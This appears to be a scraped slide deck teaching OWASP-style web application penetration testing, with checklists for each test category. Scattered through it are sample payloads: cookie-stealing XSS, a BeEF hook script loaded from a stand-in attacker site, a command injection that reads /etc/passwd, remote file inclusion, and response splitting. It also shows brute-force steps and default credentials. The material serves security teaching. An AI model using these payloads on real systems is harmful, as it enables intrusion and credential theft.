Web application vulnerability assessment

o A penetration test is a method of evaluating the security of a computer system or network by simulating an attack. o A Web Application Penetration Test focuses only on evaluating the security of a web application. o The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. o Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution. 2

o What is a vulnerability? A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy. • A threat is a potential attack that, by exploiting a vulnerability, may harm the assets owned by an application (resources of value, such as the data in a database or in the file system). • A test is an action that tends to show a vulnerability in the application. And Vulnerability is everywhere !! 3

The OWASP Web Application Penetration Testing method is based on the black box approach. The tester knows nothing or very little information about the application to be tested. The testing model consists of: o Tester: Who performs the testing activities o Tools and methodology: The core of this Testing Guide project o Application: The black box to test 5

The test is divided into 2 phases: 1. Passive mode 2. Active mode In the passive mode, the tester tries to understand the application's logic, and plays with the application. Tools can be used for information gathering. At the end of this phase, the tester should understand all the access points (gates) of the application 6

In this phase, the tester begins to test using the methodology. We have split the set of active tests in 12 sub-categories for a total of 91 controls: I. Information Gathering II. Configuration and Deploy Management Testing III. Identity Management Testing IV. Authentication Testing V. Authorization Testing VI. Session Management Testing VII. Data Validation Testing VIII. Error Handling IX. Cryptography X. Logging XI. Business Logic Testing XII. Client Side Testing 7

1. Conduct Search Engine Discovery and Reconnaissance for Information Leakage 2. Fingerprint Web Server 3. Review Webserver Metafiles for Information Leakage 4. Enumerate Applications on Webserver 5. Review Webpage Comments and Metadata for Information Leakage 6. Identify application entry points 7. Map execution paths through application 8. Fingerprint Web Application Framework 9. Fingerprint Web Application 10. Map Network and Application Architecture 9

Using a search engine, search for: [1] Network diagrams and configurations [2] Archived posts and emails by administrators and other key staff [3] Logon procedures and username formats [4] User names and passwords [5] Error message content [6] Development, test, UAT and staging versions of the website Queries are put in several categories: Footholds Files containing usernames Sensitive Directories Web Server Detection Vulnerable Files Vulnerable Servers Error Messages Files containing juicy info Files containing passwords Sensitive Online Shopping Info 11

Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. 13

robots.txt file for Information Leakage of the web application's directory/folder path(s). 14

Testing for web application vulnerabilities is to find out which particular applications are hosted on a web server 15

Review webpage comments and metadata to better understand the application and to find any information leakage. 18

Step 1) Navigate to http://app.utu.ac.in/ and Intercept that same request using BURP Suite and send request into Intruder. 19

Step 2) Go to "Position" tab and select "GET" and click on "ADD" button 20

Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload Options category 21

Step 4) Select "Intruder" Menu and select "Start attack" option 22

Observe request and response 23

Response for OPTIONS method 24

X-Power-by Contain Development language name and version 28

Cookie default name contain its framework Word press directory structure More different framework cookie name refer : Page 75-76 (Documentation) 29

Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build 30

This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python 31

Wapplyzer is a Firefox/Chrome plug-in 32

Web server fingerprinting is a critical task for the Penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. Nmap version detection offers a lot of advanced features that can help in determining services that are running on a given host, it obtains all data by connecting to open ports and interrogating them by using probes that the specific services understand. 33

• List all the possible administrative interfaces. • Determine if administrative interfaces are available from an internal network or are also available from the Internet. Firewall/IDS Identifier script 34

1. Test Network/Infrastructure Configuration 2. Test Application Platform Configuration 3. Test File Extensions Handling for Sensitive Information 4. Backup and Unreferenced Files for Sensitive Information 5. Enumerate Infrastructure and Application Admin Interfaces 6. Test HTTP Methods 7. Test HTTP Strict Transport Security 8. Test RIA cross domain policy 35

Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself. 1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework. 2. There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. 36

1. Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages. 2. Logging information 3. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. 4. Only enable server modules (ISAPI extensions in the IIS case) that are needed for the application. 37

Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999- 0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon). 38

When each file stem is tested, Burp check for various different extensions, according to these settings. 40

While most of the files within a web server are directly handled by the server itself, it isn't uncommon to find unreferenced and/or forgotten files that can be used to obtain important information about either the infrastructure or the credentials. Same as above test but only for backup information 41

THC-HYDRA for brute force attack 1)Set target port number or Protocol 2)Add Username and Password list 42

3)Start Attack after some time we able to get root user password 43

Refer Identify application entry point 44

The use of this header by web applications avoids must be checked to know if the following security issues could be produced: • Attackers sniffing the network traffic and accessing the information transferred through unencrypted channel. • Attackers exploiting a man in the middle attack because of the problem of accepting certificates that are not trusted. • Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated the http protocol. Strict-Transport-Security: max-age=60000; includeSubDomains HSTS Header 45

Rich Internet Applications (RIA) have adopted Adobe's crossdomain.xml policy files in order to allow for controlled cross domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash. 46

1. Test Role Definitions 2. Test User Registration Process 3. Test Account Provisioning Process 4. Testing for Account Enumeration and Guessable User Account 5. Testing for Weak or unenforced username policy 47

ROLE PERMISSION OBJECT CONSTRAINTS Administrator Read Customer records Manager Read Customer records Only records related to business unit Staff Read Customer records Only records associated with customers assigned by Manager Customer Read Customer record Only own record 48

• Verify the identity requirements for user registration align with business/security requirements • Validate the registration process 50

Verify which accounts may provision other accounts and of what type 52

CN000100 CN000101 …. R1001 – user 001 for REALM1 R2001 – user 001 for REALM2 53

User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. 54

1. Testing for Credentials Transported over an Encrypted Channel 2. Testing for default credentials 3. Testing for Weak lock out mechanism 4. Testing for bypassing authentication schema 5. Test remember password functionality 6. Testing for Browser cache weakness 7. Testing for Weak password policy 8. Testing for Weak security question/answer 9. Testing for weak password change or reset functionalities 10. Testing for Weaker authentication in alternative channel 55

GET request send the credential 57

User Password Tester Tester Webmaster Webmaster Admin Admin123 System System Administrator admin …… ……. 58

Accounts are typically locked after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-service unlock mechanism, or intervention by an administrator. 59

There are several methods to bypass the authentication schema in use by a web application:  Direct page request (forced browsing)  Parameter modification  Session ID prediction  SQL injection 60

• Remember password functionality store your credential in cookie • You must check that credential is encrypted or not 62

Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0 -------------------------------- HTTP/1.1: Cache-Control: no-cache ------------------------------- HTTP/1.0: Pragma: no-cache Expires: <past date or illegal value (e.g., 0)> 63

The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456, password 64

Pre-generated questions: • The majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example: • The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?" • The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?" • The answers may be brute forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable lists of popular first names, and therefore a simple brute force attack can be scripted. • The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page. 65

In addition to the previous test it is important to verify: Is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed if an attacker is able to take control of a valid session (s)he could easily change the victim's password. 66

In addition to the previous test it is important to verify: Is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed if an attacker is able to take control of a valid session (s)he could easily change the victim's password. 67

1. Testing Directory traversal/file include 2. Testing for bypassing authorization schema 3. Testing for Privilege Escalation 4. Testing for Insecure Direct Object References 68

 Is it possible to access that resource even if the user is not authenticated?  Is it possible to access that resource after the log-out?  Is it possible to access functions and resources that should be accessible to a user that holds a different role/privilege? POST /admin/addUser.jsp HTTP/1.1 Host: www.example.com [other HTTP headers] userID=fakeuser&role=3&group=grp001 70

----------------------------------------------------------- POST /user/viewOrder.jsp HTTP/1.1 Host: www.example.com …… groupID=grp001&orderID=0001 ------------------------------------------------------------- Verify if a user that does not belong to grp001 can modify the value of the parameters ‘groupID’ and ‘orderID’ to gain access to that privileged data. 71

HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Wed, 1 Apr 2006 13:51:20 GMT Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain= www.example.com Cache-Control: no-cache Pragma: No-cache Content-length: 247 Content-Type: text/html Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <form name="autoriz" method="POST" action = "visual.jsp"> <input type="hidden" name="profile" value="SysAdmin"> <body onload="document.forms.autoriz.submit()"> </td> </tr> 72

Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. 73

http://foo.bar/somepage?invoice=12345 http://foo.bar/showImage?img=img00011 http://foo.bar/changepassword?user=someuser http://foo.bar/accessPage?menuitem=12 74

1. Testing for Bypassing Session Management Schema 2. Testing for Cookies attributes 3. Testing for Session Fixation 4. Testing for Exposed Session Variables 5. Testing for Cross Site Request Forgery 6. Testing for logout functionality 7. Test Session Timeout 8. Testing for Session puzzling 75

If you have access to the session management schema implementation, you can check for the following: Random Session Token Token length Session Time-out Cookie configuration: o non-persistent: only RAM memory o secure (set only on HTTPS channel): Set Cookie: cookie=data; path=/; domain=.aaa.it; secure o HTTPOnly (not readable by a script): Set Cookie: cookie=data; path=/; domain=.aaa.it; HTTPOnly 76

 How are Session IDs transferred? e.g., GET, POST, Form Field (including hidden fields)  Are Session IDs always sent over encrypted transport by default?  Is it possible to manipulate the application to send Session IDs unencrypted? e.g., by changing HTTP to HTTPS?  What cache-control directives are applied to requests/responses passing Session IDs?  Are these directives always present? If not, where are the exceptions?  Are GET requests incorporating the Session ID used?  If POST is used, can it be interchanged with GET? 81

Request submission without any CSRF request token. A successful CSRF exploit can compromise end user data and operation, when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application. 82

Testing for logout user interface: Testing for server-side session termination Testing for session timeout Testing session clean at client side In this phase, we check that the application automatically logs out a user when that user has been idle for a certain amount of time, ensuring that it is not possible to “reuse” the same session and that no sensitive data remains stored in the browser cache. 83

This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another. 84

1. Testing for Reflected Cross Site Scripting 2. Testing for Stored Cross Site Scripting 3. Testing for HTTP Verb Tampering 4. Testing for HTTP Parameter pollution 5. Testing for SQL Injection 5.1 Oracle Testing 5.2 MySQL Testing 5.3 SQL Server Testing 5.4 Testing PostgreSQL 5.5 MS Access Testing 5.6 Testing for NoSQL injection ……….. 85

6. Testing for LDAP Injection 7. Testing for ORM Injection 8. Testing for XML Injection 9. Testing for SSI Injection 10. Testing for XPath Injection 11. IMAP/SMTP Injection 12. Testing for Code Injection 12.1 Testing for Local File Inclusion 12.2 Testing for Remote File Inclusion 13. Testing for Command Injection 14. Testing for Buffer overflow 14.1 Testing for Heap overflow 14.2 Testing for Stack overflow 14.3 Testing for Format string 15. Testing for incubated vulnerabilities 16. Testing for HTTP Splitting/Smuggling 86

Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. http://example.com/index.php?user=<script>alert(123)</script> Bypass XSS filters Page#224 87

aaa@aa.com"><script>alert(document.cookie)</script> 88

BeEF hook aaa@aa.com”><script src=http://attackersite/hook.js></script> 89

Step 1) Navigate to http://app.utu.ac.in/ and Intercept that same request using BURP Suite and send request into Intruder. 90

Step 2) Go to "Position" tab and select "GET" and click on "ADD" button 91

Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload Options category 92

Step 4) Select "Intruder" Menu and select "Start attack" option 93

Observe request and response 94

Web Application Server Backend Parsing Result Example ASP.NET / IIS concatenated with a comma color=red,blue ASP / IIS concatenated with a comma color=red,blue PHP / Apache Last occurrence only color=blue PHP / Zeus Last occurrence only color=blue JSP, Servlet / Apache Tomcat First occurrence only color=red JSP, Servlet / Oracle Application Server 10g First occurrence only color=red http://example.com/?color=red&color=blue 95

Authentication bypass POST /add-authors.do HTTP/1.1 security_token=attackertoken&blogID=attackerblogidvalue& blogID=victimblogidvalue&authorsList=tester@gmail.com(att acker email)&ok=Invite JSP, Servlet / Jetty First occurrence only color=red IBM Lotus Domino Last occurrence only color=blue IBM HTTP Server First occurrence only color=red mod_perl, libapreq2 / Apache First occurrence only color=red Perl CGI / Apache First occurrence only color=red mod_wsgi (Python) / Apache First occurrence only color=red Python / Zope All occurrences in List data type color=['red','blue'] 96

LDAP injection testing is similar to SQL Injection testing. The differences are that we use the LDAP protocol instead of SQL and that the target is an LDAP Server instead of a SQL Server. "(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))"; 103

An ORM is an Object Relational Mapping tool. It is used to expedite object oriented development within the data access layer of software applications, including web applications. for ORM Injection vulnerabilities is identical to SQL Injection testing (see Testing for SQL Injection). Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'" Simply sending "' OR 1--" in the form where order date can be entered can yield positive results. 104

Web servers usually give developers the ability to add small pieces of dynamic code inside static HTML pages, without having to deal with full-fledged server-side or client-side languages. This feature is incarnated by Server-Side Includes (SSI) Injection. 106

.shtml file Putting an SSI directive into a static HTML document is as easy as writing a piece of code like the following: --------------------------------------------------------  -------------------------------------------------------- to print out the current time. -----------------------------------------------------------------------  ----------------------------------------------------------------------- to include the output of a CGI script. -----------------------------------------------------------------  ------------------------------------------------------------------- to include the content of a file or list files in a directory. ----------------------------------------------  ---------------------------------------------- to include the output of a system command. 107

FETCH 4791 BODY[HEADER] ---------------------------------------- In this scenario, the IMAP injection structure would be: --------------------------------------------------------------------------------- http://<webmail>/read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791 -------------------------------------------------------------------------------- Which would generate the following commands: ------------------------------------------------- ???? FETCH 4791 BODY[HEADER] V100 CAPABILITY V101 FETCH 4791 BODY[HEADER] ------------------------------------------------------ where: ---------------------------------------------------------- Header = 4791 BODY[HEADER] Body = %0d%0aV100 CAPABILITY%0d%0a Footer = V101 FETCH 4791 ------------------------------------ Result Expected: Arbitrary IMAP/SMTP command injection 109

http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/ cs.jpg?&cmd=uname%20-a 110

Testing for Local File Inclusion 112

Testing for Remote File Inclusion http://youarehack.com 114

http://sensitive/cgi-bin/userData.pl?doc=user1.txt http://sensitive/cgi-bin/userData.pl?doc=/bin/ls http://sensitive/something.php?dir=%3Bcat%20/etc/passwd 115

advanced%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent- Type:%20text/html%0d%0aContent- Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</htm l> -------------------------------------------------------------------------------- The resulting answer from the vulnerable application will therefore be the following: ----------------------------------------------------------- HTTP/1.1 302 Moved Temporarily Date: Sun, 03 Dec 2005 16:22:19 GMT Location: http://victim.com/main.jsp?interface=advanced Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 35 <html>Sorry,%20System%20Down</html> <other data> 118

1. Analysis of Error Codes 2. Analysis of Stack Traces 119

1. Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection 2. Testing for Padding Oracle 3. Testing for Sensitive information sent via unencrypted channels 122

1. Test time synchronisation 2. Test user-viewable log of authentication events 127

Date: Tue, 15 Oct 2013 14:11:09 GMT Server: Apache X-Frame-Options: Deny X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Language: en Vary: Accept-Encoding,Cookie Expires: Wed, 16 Oct 2013 14:11:09 GMT Cache-Control: max-age=86400 Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 200 OK 128

1. Testing for DOM based Cross Site Scripting 2. Testing for JavaScript Execution 3. Testing for HTML Injection 4. Testing for Client Side URL Redirect 5. Testing for CSS Injection 6. Testing for Client Side Resource Manipulation 7. Test Cross Origin Resource Sharing 8. Testing for Cross Site Flashing 9. Testing for Clickjacking 10. Testing WebSockets 11. Test Web Messaging 12. Test Local Storage 130

http://www.victim.site/?#www.malicious.site http://m.microsoft.com/library/linktrack.aspx?durl=xxxxxxxxxxxx http://login.live.com/wlogin.srf?appid=00000000xxxxxxxx&alg=wsig nin1.0&appctx=retUrl=xxxxx.xxxx/xxxx.xxx 134

www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12]) www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8) Resource Type Tag/Method Sink Frame iframe src Link a href AJAX Request xhr.open(method, [url], true); URL CSS link href Image img src Object object data Script script src 135

HTTP/1.1 200 OK Date: Mon, 07 Oct 2013 18:57:53 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.4-14+deb7u3 Access-Control-Allow-Origin: * Content-Length: 4 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: application/xml [Response Body] 136

iframe1.contentWindow.postMessage(“Hello world”,”http://www.example.com”); 141

The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. 142

Net-Square Solutions Private Limited is a niche Information Security Service provider. Net-Square completely and mainly focused on technology based areas of information security like application & infrastructure security. Net-Square Solutions was founded by an internationally experienced Information security specialist Saumil Shah in the year 2000. Since then the Net-Square has conducted many assignments for some of the best Organizations in the World in sectors ranging from Banking & Financial Services to Telecom to Retail to Pharmaceuticals. 143

Web application vulnerability assessment

In this document

More Related Content

What's hot

Viewers also liked

Similar to Web application vulnerability assessment

Recently uploaded

Web application vulnerability assessment